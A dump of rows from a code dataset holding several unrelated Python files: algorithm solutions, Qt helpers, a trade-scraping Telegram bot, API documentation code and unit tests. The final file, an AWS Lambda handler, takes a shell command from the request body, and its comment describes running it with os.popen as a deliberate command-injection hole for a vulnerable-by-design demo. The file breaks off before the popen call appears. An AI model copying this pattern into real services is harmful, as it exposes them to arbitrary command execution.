seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
17795520961 | import math
from typing import List
class Solution:
    def minEatingSpeed(self, piles: List[int], h: int) -> int:
        """Return the minimum integer eating speed k such that every banana
        pile can be finished within h hours (LeetCode 875).

        Binary-searches the smallest k in [1, 10**9] for which the total
        hours needed, sum(ceil(pile / k)), does not exceed h.
        """
        def hours_needed(speed: int) -> int:
            # Each pile costs ceil(pile / speed) whole hours.
            return sum(math.ceil(pile / speed) for pile in piles)

        lo, hi = 1, 10 ** 9
        while lo < hi:
            mid = (lo + hi) // 2
            if hours_needed(mid) > h:
                lo = mid + 1  # too slow -- need a faster speed
            else:
                hi = mid      # feasible -- try an equal or slower speed
        return lo
| fastso/learning-python | leetcode_cn/solved/pg_875.py | pg_875.py | py | 517 | python | en | code | 0 | github-code | 36 |
14128566758 | #!/usr/local/bin/ python3
# -*- coding:utf-8 -*-
# __author__ = "zenmeder"
class Solution(object):
    def findTargetSumWays(self, nums, S):
        """Count the ways to assign +/- signs to nums so the total equals S.

        Rolling-dict DP: dp maps each reachable signed total to the number
        of sign assignments producing it.
        """
        if not nums:
            return 0
        # Seed with the first element; a leading 0 takes either sign,
        # giving two equivalent assignments for the single total 0.
        dp = {nums[0]: 1, -nums[0]: 1} if nums[0] else {0: 2}
        for num in nums[1:]:
            nxt = {}
            for total, ways in dp.items():
                nxt[total + num] = nxt.get(total + num, 0) + ways
                nxt[total - num] = nxt.get(total - num, 0) + ways
            dp = nxt
        return dp.get(S, 0)
print(Solution().findTargetSumWays([0,0,0,0,0,0,0,0,1],1)) | zenmeder/leetcode | 494.py | 494.py | py | 610 | python | en | code | 0 | github-code | 36 |
28514953067 | from PyQt4.QtCore import SIGNAL, QObject
from PyQt4 import QtGui
from opus_gui.util.icon_library import IconLibrary
def create_qt_action(icon_name, text, callback, parent_qt_object):
    '''
    Convenience wrapper for building a QAction.
    @param icon_name (str) IconLibrary icon name, or None for no icon
    @param text (str) action label
    @param callback (function) zero-argument slot run on triggered()
    @param parent_qt_object (QObject) parent of the new action
    @return: the created action (QAction)
    '''
    if icon_name is None:
        new_action = QtGui.QAction(text, parent_qt_object)
    else:
        icon = IconLibrary.icon(icon_name)
        new_action = QtGui.QAction(icon, text, parent_qt_object)
    QObject.connect(new_action, SIGNAL('triggered()'), callback)
    return new_action
def get_unique_name(base_name, list_of_current_names):
    '''
    Return a name based on base_name that is not already taken.
    @param base_name (str) the preferred name
    @param list_of_current_names (list(str)) names already in use
    @return (str) base_name itself if free, otherwise base_name with an
    increasing numeric suffix (base_name_1, base_name_2, ...)
    '''
    candidate = base_name
    suffix = 0
    while candidate in list_of_current_names:
        suffix += 1
        candidate = '%s_%d' % (base_name, suffix)
    return candidate
def dictionary_to_menu(source_dict, callback, display_func = None, parent_widget = None):
    '''
    Converts a dictionary into a hierarchical menu.
    @param source_dict The dictionary to convert.
    @param callback is called with the object as an argument when a menu item is selected.
    @param display_func An optionally called to display the objects (defaults to str()).
    @param parent_widget parent QWidget for the created menus and actions.
    @return the top-level QMenu
    Example:
    {'one': 'Fish',
     'two': ['orange', 'apple'],
     'three': {'four': 'guppy', 'five': 'guppy'}
    }
    generates a menu with three items in the top level ('one', 'two', 'three')
    'one' contains one item; 'fish'
    'two' contains two items; 'orange' and 'apple'
    'three' contains two submenus; 'four' and 'five'. Both submenus has one item 'guppy'
    '''
    top_menu = QtGui.QMenu(parent_widget)
    if not display_func:
        display_func = str
    for key, items in source_dict.items():
        sub_menu = QtGui.QMenu(str(key), parent_widget)
        if isinstance(items, dict):
            # BUGFIX: the recursive call used to pass parent_widget in the
            # display_func slot, so nested levels silently lost the custom
            # display function. Pass both through in their own positions.
            dict_menu = dictionary_to_menu(items, callback, display_func,
                                           parent_widget)
            sub_menu.addMenu(dict_menu)
        else:
            for item in list(items): # makes sure single items are iterable
                # Bind item as a default argument to avoid the late-binding
                # closure pitfall.
                item_cb = lambda x = item: callback(x)
                action = create_qt_action(None, display_func(item), item_cb, parent_widget)
                sub_menu.addAction(action)
        top_menu.addMenu(sub_menu)
    return top_menu
def hide_widget_on_value_change(widget_to_hide, value_holding_widget,
                                signal = 'textChanged(const QString &)',
                                hide_method = None):
    ''' Hide widget_to_hide whenever value_holding_widget emits *signal*.

    Handy for dismissing a warning label about erroneous user input as soon
    as the user starts correcting that input.
    @param widget_to_hide widget to hide when the signal fires
    @param value_holding_widget widget whose signal we listen to
    @param signal (default textChanged) the signal to listen for
    @param hide_method slot to invoke on the signal; defaults to one that
    ignores the signal's argument and calls widget_to_hide.setVisible(False)'''
    if hide_method is None:
        def _default_hide(_ignored, target = widget_to_hide):
            target.setVisible(False)
        hide_method = _default_hide
    QtGui.QWidget.connect(value_holding_widget, SIGNAL(signal), hide_method)
| psrc/urbansim | opus_gui/util/convenience.py | convenience.py | py | 3,823 | python | en | code | 4 | github-code | 36 |
2440750792 | #!/bin/env python3
from typing import Optional, TypeVar
from sqlmodel import SQLModel, Field
class MedicationLinkBase(SQLModel):
    """Mixin adding an optional foreign key to the medication table."""
    # None until the row is linked to a medication.
    medication_id : Optional[int] = Field(
        default=None,
        foreign_key="medication.id"
    )
class MedicationLinkBaseWithRequiredID(SQLModel):
    """Mixin with a required (non-nullable) foreign key to medication.id."""
    medication_id : int = Field(
        foreign_key="medication.id"
    )
class MedicationLinkBaseAsPrimaryKey(SQLModel):
    """Mixin whose medication FK also serves as (part of) the primary key.

    Optional/None default lets the database assign the value on insert.
    """
    medication_id : Optional[int] = Field(
        default=None,
        foreign_key="medication.id",
        primary_key=True
    )
class MedicationLinkBaseAsPrimaryKeyWithRequiredID(SQLModel):
    """Mixin with a required medication FK that is also a primary key."""
    medication_id : int = Field(
        foreign_key="medication.id",
        primary_key=True
    )
# Type variable covering every medication-link base variant above, for
# generic helpers that accept any of the four flavors.
T_MedicationLink_TypeVar = TypeVar(
    "T_MedicationLink_TypeVar",
    bound=MedicationLinkBase|MedicationLinkBaseAsPrimaryKey|MedicationLinkBaseWithRequiredID|MedicationLinkBaseAsPrimaryKeyWithRequiredID
)
| shlomo-Kallner/poppy_backend_assessment | src/poppy_s/lib/models/base/medications.py | medications.py | py | 924 | python | en | code | 0 | github-code | 36 |
23214835305 | # -*- coding: utf-8 -*-
import json
import re
from datetime import date
import dryscrape
from bs4 import BeautifulSoup
# Column headers of the trades table on spimex.com; these exact strings are
# used as dictionary keys throughout the module. (Russian UI labels --
# "instrument", "offer", "demand", "weighted avg price", "contract volume",
# "number of contracts", "refinery".)
titles = [
    'Биржевой инструмент', # 0
    'Предл.', # 1
    'Спрос', # 2
    'Ср.вз. цена', # 3
    'Объем договоров', # 4
    'Кол - во дог.', # 5
    'НПЗ' # 6
]
# Character class of everything stripped from scraped cell text. Inside the
# class the parentheses and '.' are literal, so the kept characters are:
# latin letters, digits, and ( ) р т . + - %
remove_pattern = r"[^(a-z)(A-Z)(0-9)(р.)(т.)(+)(-)(%)]"
# Fold a freshly-observed trade into the running daily totals.
def add_trade_in_total_stat(data, old_data, new_trades, total_stat):
    """Update total_stat in place with new_trades deals.

    Adds the trade count and volume delta, and folds the latest weighted
    average price into total_stat['average_price'] by repeated halving
    (matching the original accumulation scheme).
    """
    total_stat['count'] += new_trades
    total_stat['amount'] += get_trade_amount(data=data, old_data=old_data)
    latest_price = data[titles[3]]['price']
    if not total_stat['average_price']:
        total_stat['average_price'] = latest_price
    else:
        combined = total_stat['average_price'] + latest_price
        total_stat['average_price'] = combined / 2
# Traded-volume delta between two snapshots of the same instrument.
def get_trade_amount(data, old_data):
    """Return the contract-volume difference: data minus old_data."""
    new_volume = get_number(data[titles[4]]['amount'])
    old_volume = get_number(old_data[titles[4]]['amount'])
    return new_volume - old_volume
# Strip noise characters from scraped cell text.
def get_clear_text(dirty_text):
    """Return dirty_text with every character outside the module-level
    remove_pattern whitelist removed."""
    return re.sub(remove_pattern, '', dirty_text)
# Extract an integer from a scraped value.
def get_number(string):
    """Return *string* as an int by discarding every non-digit character.

    Integers pass through unchanged. A value containing no digits at all
    (e.g. '-' or '') yields 0 instead of raising ValueError, so empty
    table cells do not crash the scraper. Note: any minus sign is stripped,
    so the result is always non-negative for string input.
    """
    if isinstance(string, int):
        return string
    digits = re.sub(r"\D", '', string)
    return int(digits) if digits else 0
# Parse one table row of market data.
def get_data(tr):
    """Extract one instrument's row from the trades table.

    Returns (row_id, data) where data maps the column headers in `titles`
    to parsed cell values. Cells that are missing the expected span markup
    fall back to zero/placeholder values instead of raising.
    """
    data = {}
    data['id'] = tr['id']
    children = tr.find_all('td', recursive=False)
    # Instrument name (column 0), e.g. stable gas condensate + station.
    data[titles[0]] = children[0].find('a').get_text()
    # Offer (column 1): price in the red span, volume in the gray span.
    try:
        supply = {}
        supply['price'] = children[1].find('span', class_="red").get_text()
        supply['price'] = get_clear_text(supply['price'])
        supply['amount'] = children[1].find('span', class_="gray").get_text()
        supply['amount'] = get_clear_text(supply['amount'])
        data[titles[1]] = supply
    except AttributeError:
        data[titles[1]] = { 'price': 0, 'amount': 0 }
    # Demand (column 2): price in the green span, volume in the gray span.
    try:
        demand = {}
        demand['price'] = children[2].find('span', class_="green").get_text()
        demand['price'] = get_clear_text(demand['price'])
        demand['amount'] = children[2].find('span', class_="gray").get_text()
        demand['amount'] = get_clear_text(demand['amount'])
        data[titles[2]] = demand
    except AttributeError:
        data[titles[2]] = { 'price': 0, 'amount': 0 }
    # Weighted average price (column 3): percent change + absolute price.
    try:
        average = {}
        average['percent'] = children[3].find('span', class_="green").get_text()
        average['percent'] = get_clear_text(average['percent'])
        average['price'] = children[3].find(text=True)
        average['price'] = get_number(get_clear_text(average['price']))
        data[titles[3]] = average
    except AttributeError:
        data[titles[3]] = { 'percent': 0, 'price': 0 }
    # Contract volume (column 4): tonnage + ruble cost.
    try:
        size = {}
        size['amount'] = children[4].find('span', class_="gray").get_text()
        size['amount'] = get_clear_text(size['amount'])
        size['cost'] = children[4].find(text=True)
        size['cost'] = get_clear_text(size['cost'])
        data[titles[4]] = size
    except AttributeError:
        data[titles[4]] = { 'amount': 0, 'cost': 0 }
    # Number of contracts (column 5).
    try:
        trades_count = children[5].find(text=True)
        trades_count = get_clear_text(trades_count)
        data[titles[5]] = int(trades_count)
    except ValueError:
        data[titles[5]] = 0
    # Refinery name (column 6).
    try:
        company_name = children[6].find(text=True)
        company_name = get_clear_text(company_name)
        data[titles[6]] = company_name
    except ValueError:
        data[titles[6]] = '-'
    return data['id'], data
# Detect whether new deals were closed since the previous snapshot.
def check_new_trades(data, old_data):
    """Return the number of trades executed between old_data and data."""
    current_count = get_number(data[titles[5]])
    previous_count = get_number(old_data[titles[5]])
    return current_count - previous_count
# Build the (Russian-language) notification text for the Telegram bot.
def generate_msg(data, old_data=None, new_trades=1):
    """Return a human-readable message describing market activity.

    With old_data given: announces that new_trades deal(s) happened, with
    the weighted average price and the traded volume delta.
    Without old_data: announces a new offer (if an offer volume is present)
    or a new demand, with its price and volume.
    All message strings are deliberately in Russian (user-facing text).
    """
    title = data[titles[0]]
    id = data['id']
    # "A DEAL happened on <instrument> at <price> in <volume>"
    if old_data:
        msg = 'На бирже ПРОИЗОШЛА!!! "СДЕЛКА!!!"'
        if new_trades > 1:
            msg = 'На бирже ПРОИЗОШЛИ!!! "СДЕЛКИ!!!" (%s)' % new_trades
        price = data[titles[3]]['price']
        amount = get_trade_amount(data, old_data)
        msg += ' на "{0}"(id={1}) по "ЦЕНЕ"({2}р.) в "ОБЪЁМЕ"({3}т.)' \
            .format(
                title, # instrument name
                id,
                price, # weighted average price
                amount # volume delta
            )
        return msg
    # "A new OFFER appeared ..." / "A new DEMAND appeared ..."
    if data[titles[1]]['amount']:
        msg = 'На бирже появилось "ПРЕДЛОЖЕНИЕ"'
        price = data[titles[1]]['price']
        amount = get_number(data[titles[1]]['amount'])
    else:
        msg = 'На бирже появился "СПРОС"'
        price = data[titles[2]]['price']
        amount = get_number(data[titles[2]]['amount'])
    msg += ' на "{0}"(id={1}) по "ЦЕНЕ"({2}р.) в "ОБЪЁМЕ"({3}т.)' \
        .format(
            title, # instrument name
            id,
            price, # price
            amount # volume
        )
    return msg
# Persist the accumulated state so it survives a script restart.
def data_to_cache(positions, total_stat):
    """Write positions and total_stat to per-day JSON files under cache/.

    Uses `with` so the file handles are closed (and flushed) even if
    serialization fails partway through.
    """
    with open('cache/positions_%s.json' % date.today(), 'w') as positions_file:
        positions_file.write(json.dumps(positions))
    with open('cache/total_stat_%s.json' % date.today(), 'w') as total_stat_file:
        total_stat_file.write(json.dumps(total_stat))
def run_bot(positions, total_stat, dispatcher, chat_id, add_link=True):
    """Scrape the spimex.com oil-products trades page and notify Telegram.

    For each gas-condensate instrument row: if the instrument is new,
    announce the offer/demand; if it was seen before and its trade count
    grew, announce the deal(s) and update total_stat. Mutates `positions`
    (id -> last parsed row) and persists both dicts to cache/ at the end.
    """
    # Some sites refuse content without a user-agent; kept for reference.
    # headers = {'user-agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'}
    base_url = 'http://spimex.com/'
    url = base_url + 'markets/oil_products/trades/'
    # A random query param could be appended to defeat caching if needed:
    # url = base_url + 'markets/oil_products/trades/?r=' + str(random.random())
    session = dryscrape.Session()
    session.visit(url)
    response = session.body()
    soup = BeautifulSoup(response, "lxml")
    tds = soup.find_all('td', class_='td_name')
    count = len(tds)
    # Match "gas condensate" in either word order, case-insensitively.
    search_pattern = re.compile(r"(конденсат газовый)|(газовый конденсат)", re.IGNORECASE)
    print('%s инструментов по url' % count, url)
    for td in tds:
        if not search_pattern.search(td.text):
            continue
        msg = ''
        # Parent row of the matching name cell.
        tr = td.find_previous('tr')
        id, data = get_data(tr)
        if id in positions: # instrument seen before
            old_data = positions[id]
            new_trades = check_new_trades(data=data, old_data=old_data)
            if new_trades > 0:
                positions[id] = data
                msg = generate_msg(data=data, old_data=old_data, new_trades=new_trades)
                add_trade_in_total_stat(data=data, old_data=old_data, new_trades=new_trades, total_stat=total_stat)
        else:
            positions[id] = data
            msg = generate_msg(data=data)
        if msg:
            parse_mode = None
            disable_web_page_preview = None
            if add_link:
                # Append the instrument-info link as raw HTML.
                parse_mode = 'HTML'
                disable_web_page_preview = True
                a = tr.find('a', attrs={"title": "Информация об инструменте"})
                a['href'] = base_url + a['href']
                msg += '\r\n'
                msg += str(a)
            print(msg)
            dispatcher.bot.send_message(
                chat_id=chat_id,
                text=msg,
                parse_mode=parse_mode,
                disable_web_page_preview=disable_web_page_preview
            )
    data_to_cache(positions, total_stat)
| rbikbov/test_python_bot | bot.py | bot.py | py | 9,250 | python | ru | code | 0 | github-code | 36 |
74768116583 | from collections import namedtuple
from datetime import date
import json
from django.shortcuts import reverse
from django.template import loader
from djaveAPI.find_models import publishable_model_from_name
from djaveAPI.paged_results import construct_paged_results
from djaveAPI.to_json import TYPE
from djaveAPI.widgets.field_table import field_table
from djaveClassMagic.model_fields import (
model_fields, DATE_TIME, DATE, INTEGER, FLOAT, TEXT, CHAR, BOOLEAN)
from djaveDT import to_tz_dt
from djaveURL import dict_as_query
def docs(model_name, api_root_url):
    """Render the docs.html page describing the named publishable model."""
    model = publishable_model_from_name(model_name)
    template = loader.get_template('docs.html')
    if hasattr(model, 'model_description'):
        model_description = model.model_description()
    else:
        model_description = 'Somebody go put def model_description() in {}'.format(
            model_name)
    # TODO: naive "+s" pluralization (flagged as a hack in the original);
    # revisit when a counter-example turns up.
    model_plural_name = '{}s'.format(model_name)
    context = {
        'model_name': model_name,
        'model_name_lower': model_name.lower(),
        'model_plural_name': model_plural_name,
        'model_description': model_description,
        'fields_table': field_table(model),
        'examples': examples(model, api_root_url)}
    return template.render(context)
# One documented API call: a heading, the shell command, and its output.
APIExample = namedtuple('APIExample', 'title code result')
# Skeletons for the curl examples; the {} slot takes the URL (POST adds the
# content-type header and keeps a second {} slot for the URL).
GET_PREFIX = 'curl -u <api_key_username>:<api_key_password> {}'
POST_PREFIX = GET_PREFIX.format('-H "Content-Type: application/json" {}')
def examples(model, api_root_url):
    """Build the ordered list of APIExample entries shown on the docs page:
    list, filtered list, get-one, create, update, delete, and webhook."""
    list_url = _base_url(api_root_url, model)
    query = example_filters(model)
    query['page'] = 1
    filtered_url = '{}{}'.format(list_url, dict_as_query(query))
    get_one_url = '{}/{}'.format(list_url, 10)
    list_result = example_list_result(model)
    single = example_single_result(model)
    return [
        APIExample('Get all', GET_PREFIX.format(list_url), list_result),
        APIExample('Get a filtered list', GET_PREFIX.format(filtered_url),
                   list_result),
        APIExample('Get one', GET_PREFIX.format(get_one_url), single),
        APIExample('Create', example_create(model, api_root_url), single),
        APIExample('Update', example_update(model, api_root_url), single),
        APIExample('"Delete"', example_delete(model, api_root_url),
                   example_single_result(model, deleted=True)),
        APIExample('Webhook', example_webhook(model, single), ''),
    ]
def example_webhook(model, single):
    """Render the webhook example: explanatory comment lines followed by a
    sample POST payload for the given model."""
    header = (
        '# If a new {} gets created, or an existing one changes,\n'
        '# and if you give your API Key a webhook URL, we will POST\n'
        '# something like this to your webhook URL:\n\n{}')
    return header.format(model.__name__, single)
def example_list_result(model):
    """Pretty-printed JSON for a one-item paged listing of the example record."""
    page = construct_paged_results([example_to_dict(model)], 1, 1, 1)
    return json.dumps(page, indent=2)
def example_single_result(model, deleted=False):
    """Pretty-printed JSON for a single example record (optionally shown in
    its deleted state)."""
    record = example_to_dict(model, deleted=deleted)
    return json.dumps(record, indent=2)
def example_to_dict(model, deleted=False):
    """Example record for *model* as a dict, tagged with its type name."""
    record = example_values(model, exclude=[], exclude_uneditable=False)
    record[TYPE] = model.__name__
    if 'deleted' in record and not deleted:
        record['deleted'] = None
    # Django's auth User signals deletion via is_active instead of deleted.
    if 'is_active' in record and deleted:
        record['is_active'] = False
    return record
def example_delete(model, api_root_url):
    """curl command demonstrating a DELETE on record id 10."""
    target = '{}/10'.format(_base_url(api_root_url, model))
    return GET_PREFIX.format('-X DELETE {}'.format(target))
def example_create(model, api_root_url):
    """curl command demonstrating a POST that creates a new record."""
    payload = example_values_str(
        model, exclude=['deleted'], exclude_uneditable=True)
    return POST_PREFIX.format(
        '-d {} {}'.format(payload, _base_url(api_root_url, model)))
def example_update(model, api_root_url):
    """curl command demonstrating a POST that updates record id 10."""
    payload = example_values_str(
        model, exclude=['deleted'], exclude_uneditable=True)
    return POST_PREFIX.format(
        '-d {} {}/10'.format(payload, _base_url(api_root_url, model)))
def _base_url(api_root_url, model):
    """Absolute list endpoint URL for *model* under *api_root_url*."""
    endpoint = reverse(
        'list_or_save_new', kwargs={'model_name': model.__name__})
    return '{}{}'.format(api_root_url, endpoint)
def example_values(model, exclude=[], exclude_uneditable=True):
    """Map each documented field of *model* to an example value.

    Fields named in *exclude* are skipped, as are non-editable fields when
    *exclude_uneditable* is set. (The [] default is only read, never
    mutated, so the shared-mutable-default pitfall does not apply.)
    """
    return {
        field.name: _example_value(field)
        for field in model_fields(model)
        if field.name not in exclude
        and (field.editable or not exclude_uneditable)
    }
def example_values_str(model, exclude=[], exclude_uneditable=True):
    """Render example field values as an escaped JSON argument for curl.

    Double quotes are backslash-escaped because (per a StackOverflow report
    from a Windows user) single-quoted JSON does not survive every shell.
    """
    values = example_values(model, exclude, exclude_uneditable)
    pairs = []
    for key, value in values.items():
        rendered = '\\"{}\\"'.format(value) if isinstance(value, str) else value
        pairs.append('\\"{}\\": {}'.format(key, rendered))
    body = '"{' + ', '.join(pairs) + '}"'
    # JSON booleans are lowercase.
    return body.replace('True', 'true')
def example_filters(model):
    """Build an example query-string dict for *model*: a direct filter for
    FK/boolean fields, or a __gte/__lte range pair for date/number fields.

    Raises Exception for filterable field types with no example mapping.
    """
    filters = {}
    for field in model_fields(model):
        if field.can_filter:
            name = field.name
            name__gte = '{}__gte'.format(name)
            name__lte = '{}__lte'.format(name)
            if field.foreign_key_to:
                filters[name] = _example_value(field)
            elif field.type == DATE_TIME:
                filters[name__gte] = _example_value(field)
                filters[name__lte] = to_tz_dt('2020-02-28 23:59').isoformat()
            elif field.type == DATE:
                filters[name__gte] = _example_value(field)
                filters[name__lte] = date(2020, 2, 28).isoformat()
            elif field.type == INTEGER:
                filters[name__gte] = _example_value(field)
                filters[name__lte] = 20
            elif field.type == FLOAT:
                filters[name__gte] = _example_value(field)
                filters[name__lte] = 200.2
            elif field.type == BOOLEAN:
                filters[name] = True
            else:
                raise Exception(
                    'I am not sure what an example {} filter looks like'.format(
                        field.type))
    return filters
def _example_value(field):
    """Return a representative example value for a single model field,
    keyed on its type (FK id, ISO datetime/date, int, float, str, bool).

    Raises Exception for types with no example defined.
    """
    if field.foreign_key_to:
        return 4321
    elif field.type == DATE_TIME:
        return to_tz_dt('2020-02-01 00:00').isoformat()
    elif field.type == DATE:
        return date(2020, 2, 1).isoformat()
    elif field.type == INTEGER:
        return 10
    elif field.type == FLOAT:
        return 100.1
    elif field.type in [TEXT, CHAR]:
        # Fields named like *_currency get a currency code example.
        if field.name.find('_currency') > 0:
            return 'USD'
        return 'Hello'
    elif field.type == BOOLEAN:
        return True
    raise Exception(field.type)
| dasmith2/djaveAPI | djaveAPI/docs.py | docs.py | py | 6,615 | python | en | code | 0 | github-code | 36 |
1076138061 | import unittest
from AntiSpam import AntiSpam
class TestAntiSpam(unittest.TestCase):
    """Unit tests for the AntiSpam helper (domain extraction and hacker
    detection on a fixed email fixture)."""
    def setUp(self) -> None:
        # Fresh AntiSpam instance and email fixture for every test.
        self.antiSpam = AntiSpam()
        self.emailList = [
            'nombre1@hotmail.com',
            'nombre2@outlook.com',
            'nombre3@yahoo.es',
            'nombre4@hotmail.com',
            'nombre2@outlook.com',
            'nombre5@hotmail.com'
        ]
        return super().setUp()
    def test_extractDomain(self):
        # Test extractDomian method: no '@' yields '', otherwise the part
        # after the '@'.
        self.assertEqual(self.antiSpam.extractDomain("manolito.gafotas.com"), "", "Should be empty string")
        self.assertEqual(self.antiSpam.extractDomain("manolito@gafotas.com"), "gafotas.com", "Should be 'gafotas.com'")
    def test_findSmartHackers(self):
        # Test findSmartHackers method: rejects non-list and empty input,
        # and returns the expected hotmail addresses from the fixture.
        self.assertRaises(TypeError, self.antiSpam.findSmartHackers, "")
        self.assertRaises(ValueError, self.antiSpam.findSmartHackers, [])
        self.assertEqual(
            self.antiSpam.findSmartHackers(self.emailList),
            ['nombre1@hotmail.com', 'nombre4@hotmail.com', 'nombre5@hotmail.com'],
            "Error in returned list"
        )
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| malandrinersdev/desafio-miniaoc | soluciones/guillermoig/reto-1/test_AntiSpam.py | test_AntiSpam.py | py | 1,212 | python | en | code | 2 | github-code | 36 |
12020470252 | import container
import procs.procLoader
import terrainLoader
import things.thing
import things.stats
import util.boostedDie
import util.serializer
## Order in which we serialize records.
# NOTE(review): the None entries presumably act as group separators for
# util.record.serializeRecord -- confirm against that function.
FIELD_ORDER = ['name', None,
        'templates', None,
        'display', None,
        'interactions', None,
        'flags', None,
        'mods', None
]
## Attributes that we copy verbatim over from the TerrainFactory to the
# Terrain instance.
COPIED_FIELDS = ['name', 'display']
## TerrainFactories instantiate Terrain instances.
class TerrainFactory:
    ## \param record The record from terrain.txt defining the Terrain.
    # Templates listed in the record are applied first (in order), then the
    # record's own fields, so the record overrides its templates.
    def __init__(self, record):
        ## Keep a copy around for later reserialization.
        self.record = record
        ## Unique identifier
        self.name = None
        ## Display metadata.
        self.display = {}
        ## List of other Terrain types we descend from, which apply themselves
        # as templates to ourselves.
        self.templates = []
        ## Maps action names to lists of procs to invoke when those actions
        # occur.
        self.interactions = {}
        ## Binary modifiers, like whether or not something can be seen through.
        # These will be converted to +1 stat modifiers when actual Terrain is
        # created; this is purely a convenience for when writing out the
        # terrain records.
        self.flags = []
        ## Stats instance.
        self.stats = things.stats.Stats()
        if 'templates' in record:
            for name in record['templates']:
                template = terrainLoader.getTerrainFactory(name)
                self.updateFields(template.__dict__)
        self.updateFields(record)
    ## Apply all of the values in the provided dictionary to ourselves.
    # Lists are extended, interactions are merged (preProcs prepend, procs
    # and postProcs append), scalars overwrite. (Python 2: iteritems.)
    def updateFields(self, record):
        for key, value in record.iteritems():
            if key == 'templates':
                # Don't do this one, since we don't ever directly inherit it.
                continue
            elif key == 'interactions':
                for interaction in value:
                    # Remap the provided list of dictionaries into a mapping of
                    # the "action" value to a list of procs.
                    action = interaction['action']
                    if action not in self.interactions:
                        self.interactions[action] = []
                    if 'preProcs' in interaction:
                        self.interactions[action] = interaction['preProcs'] + self.interactions[action]
                    if 'procs' in interaction:
                        self.interactions[action].extend(interaction['procs'])
                    if 'postProcs' in interaction:
                        self.interactions[action].extend(interaction['postProcs'])
            elif type(value) is list:
                if not hasattr(self, key):
                    setattr(self, key, [])
                getattr(self, key).extend(value)
            else:
                # Assume scalar.
                setattr(self, key, value)
    ## Generate an appropriate Terrain instance of the given level.
    # Primarily this means instantiating Procs for the transitions.
    def makeTerrain(self, gameMap, pos, mapLevel):
        result = Terrain(gameMap, pos)
        for field in COPIED_FIELDS:
            setattr(result, field, getattr(self, field))
        # Stat modifiers may have values that need to be evaluated now.
        result.stats = self.stats.copy()
        result.stats.roll(mapLevel)
        # Merge binary values into the mods dict.
        for flag in self.flags:
            result.stats.addMod(flag, things.stats.StatMod(0, 1))
        # Procs need to be instantiated for all interactions, now.
        for action, procRecords in self.interactions.iteritems():
            newProcs = [procs.procLoader.generateProcFromRecord(procRecord, mapLevel) for procRecord in procRecords]
            result.interactions[action] = newProcs
        result.mapLevel = mapLevel
        result.init(gameMap)
        return result
    ## Serialize our original record for writing back out.
    # NOTE(review): util.record is not imported at the top of this file
    # (only util.boostedDie / util.serializer are) -- confirm the util
    # package exposes a `record` submodule, otherwise this raises.
    def getSerialization(self):
        return util.record.serializeRecord(self.record, FIELD_ORDER)
## Terrain are Things that don't move around or act autonomously, but have a
# number of interactions that transform them into other Terrains or destroy
# them (e.g. opening doors, digging out walls).
class Terrain(things.thing.Thing):
    def __init__(self, gameMap, pos):
        things.thing.Thing.__init__(self, pos)
        if pos:
            gameMap.addSubscriber(self, pos)
        ## Name of the terrain
        self.name = None
        ## Level at which the terrain was created.
        self.mapLevel = None
        ## Display information.
        self.display = {}
        ## Relevant stats for the terrain instance.
        self.stats = things.stats.Stats()
        ## Maps action names to the procs that occur when something performs
        # that action on us.
        self.interactions = {}
    ## Now that we're instantiated, add us to any appropriate containers.
    # Subscription groups are derived from our stats and from which
    # interaction actions we support.
    def init(self, gameMap):
        gameMap.addSubscriber(self, container.TERRAIN)
        if self.stats.getStatValue('OBSTRUCT'):
            gameMap.addSubscriber(self, container.BLOCKERS)
        if self.stats.getStatValue('INTERESTING'):
            gameMap.addSubscriber(self, container.INTERESTING)
        if self.stats.getStatValue('OPAQUE'):
            gameMap.addSubscriber(self, container.OPAQUES)
        for action, group in [('open', container.OPENABLES),
                ('close', container.CLOSABLES),
                ('descend', container.DESCENDABLES),
                ('ascend', container.ASCENDABLES),
                ('tunnel', container.TUNNELABLES)]:
            if action in self.interactions:
                gameMap.addSubscriber(self, group)
    ## React to trying to move through us: passable unless OBSTRUCT is set.
    def canMoveThrough(self, target):
        return (self.stats.getStatValue('OBSTRUCT') == 0)
    ## Interact with the Terrain instance.
    # \param action String describing the action to do; we use this to look
    # up any associated procs we have.
    # \param actor Thing performing the action.
    # \param pos Position of the Terrain being interacted with -- in the event
    # that our own pos field is invalid (because we're being aliased to
    # multiple locations simultaneously).
    def interact(self, action, actor, gameMap, pos):
        for proc in self.interactions[action]:
            if not proc.trigger(terrain = self, actor = actor,
                    gameMap = gameMap, pos = pos):
                # The proc blocked further procs from proceeding
                break
    ## Generate a ready-to-be-serialized dict of this Terrain's information.
    # See the util.serializer module for more information.
    def getSerializationDict(self):
        return self.__dict__
    ## Convert to a string for display (Python 2 unicode protocol).
    def __unicode__(self):
        return u"<Terrain %s at %s>" % (self.name, self.pos)
## Make a "blank" Terrain instance for deserialization.
def makeBlankTerrain(gameMap):
    return Terrain(gameMap, (-1, -1))

# Register so the serializer can reconstruct Terrain objects by class name.
util.serializer.registerObjectClass(Terrain.__name__, makeBlankTerrain)
| Valoren/Angpy | things/terrain/terrain.py | terrain.py | py | 7,247 | python | en | code | 1 | github-code | 36 |
30164407430 | #!/usr/bin/python3
"""
File: test_file_storage.py
"""
import unittest
import json
class TestFileStorage(unittest.TestCase):
    """File Storage Test"""
    def test_json_load(self):
        # file.json must deserialize to a dict (the storage format).
        with open("file.json") as fd:
            d = json.load(fd)
        self.assertEqual(isinstance(d, dict), True)
    def test_file(self):
        # The storage file must not be empty.
        with open("file.json") as fd:
            self.assertTrue(len(fd.read()) > 0)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| peterkthomas/AirBnB_clone | tests/test_models/test_engine/test_file_storage.py | test_file_storage.py | py | 474 | python | en | code | 0 | github-code | 36 |
6926982149 | import json
import os
import boto3
import time
def lambda_handler(event, context):
    """Entry point: run a caller-supplied shell command, publish the result
    to SNS, and echo it back in the HTTP response.

    Accepts `body` either as a JSON string (API Gateway) or as an
    already-parsed dict (direct invocation).
    """
    body = event['body']
    if isinstance(body, str):
        body = json.loads(body)
    data = body['data']
    command = body['command']

    # SECURITY: os.popen executes an arbitrary caller-controlled shell
    # command -- a command-injection sink. Intentional in this
    # vulnerable-by-design demo app; must never appear in production code.
